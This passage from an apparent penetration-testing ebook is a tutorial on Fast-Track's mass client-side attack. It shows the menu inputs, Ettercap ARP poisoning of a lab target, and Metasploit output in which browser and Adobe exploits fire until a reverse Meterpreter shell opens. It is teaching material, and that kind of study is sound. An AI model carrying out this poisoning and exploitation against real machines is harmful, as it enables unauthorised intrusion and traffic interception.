Mass Client-Side Attack

The mass client-side attack is similar to the Browser Autopwn function; however, this attack includes additional exploits and built-in features that can incorporate ARP cache and DNS poisoning on the target’s machine, and additional browser exploits not included in Metasploit.

When a user connects to your web server, Fast-Track will fire off every exploit in its arsenal as well as those in the Metasploit Framework. If the user’s machine is susceptible to a specific vulnerability within one of these libraries, the attacker will obtain full access to the target machine.

 Enter the number: 4

  . . . SNIP . . .

 Enter the IP Address you want the web server to listen on: 10.211.55.130

  Specify your payload:

  1. Windows Meterpreter Reverse Meterpreter
  2. Generic Bind Shell
  3. Windows VNC Inject Reverse_TCP (aka "Da Gui")
  4. Reverse TCP Shell

 Enter the number of the payload you want: 1

After selecting option 4, Mass Client-Side Attack , from the main menu, tell Fast-Track what IP address the web server should listen on , and then choose a payload .

Next, decide whether to use Ettercap to ARP-poison your target machine. Ettercap will intercept all requests that the target makes and redirect them to your malicious server. After confirming that you want to use Ettercap at , enter the IP address of the target you want to poison . Fast-Track will then go ahead and set up Ettercap for you.

 Would you like to use Ettercap to ARP poison a host yes or no: yes

  . . . SNIP . . .

 What IP Address do you want to poison: 10.211.55.128
  Setting up the ettercap filters....
  Filter created...
  Compiling Ettercap filter...

  . . . SNIP . . .

 Filter compiled...Running Ettercap and poisoning target...

Once a client connects to your malicious server, Metasploit fires exploits at the target. In the following listing, you can see that the Adobe exploit is successful, and a Meterpreter shell is waiting .

Note

You could use ARP cache poisoning within this attack, but it will only work when you are on the same local and unrestricted subnet as the target.

[*] Local IP: http://10.211.55.130:8071/
  [*] Server started.
  [*] Handler binding to LHOST 0.0.0.0
  [*] Started reverse handler
  [*] Exploit running as background job.
  [*] Using URL: http://0.0.0.0:8072/
  [*] Local IP: http://10.211.55.130:8072/
  [*] Server started.
  msf exploit(zenturiprogramchecker_unsafe) >
  [*] Handler binding to LHOST 0.0.0.0
  [*] Started reverse handler
  [*] Using URL: http://0.0.0.0:8073/
  [*] Local IP: http://10.211.55.130:8073/
  [*] Server started.
 [*] Sending Adobe Collab.getIcon() Buffer Overflow to 10.211.55.128:1044...
  [*] Attempting to exploit ani_loadimage_chunksize
  [*] Sending HTML page to 10.211.55.128:1047...
  [*] Sending Adobe JBIG2Decode Memory Corruption Exploit to 10.211.55.128:1046...
  [*] Sending exploit to 10.211.55.128:1049...
  [*] Attempting to exploit ani_loadimage_chunksize
  [*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP) to
       10.211.55.128:1076...
  [*] Transmitting intermediate stager for over-sized stage...(216 bytes)
  [*] Sending stage (718336 bytes)
 [*] Meterpreter session 1 opened (10.211.55.130:9007 -> 10.211.55.128:1077
  msf exploit(zenturiprogramchecker_unsafe) > sessions -l

  Active sessions
  ===============

  Id Description Tunnel
  -- ----------- ------
  1 Meterpreter 10.211.55.130:9007 -> 10.211.55.128:1077

  msf exploit(zenturiprogramchecker_unsafe) > sessions -i 1
  [*] Starting interaction with 1...

  meterpreter >
..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset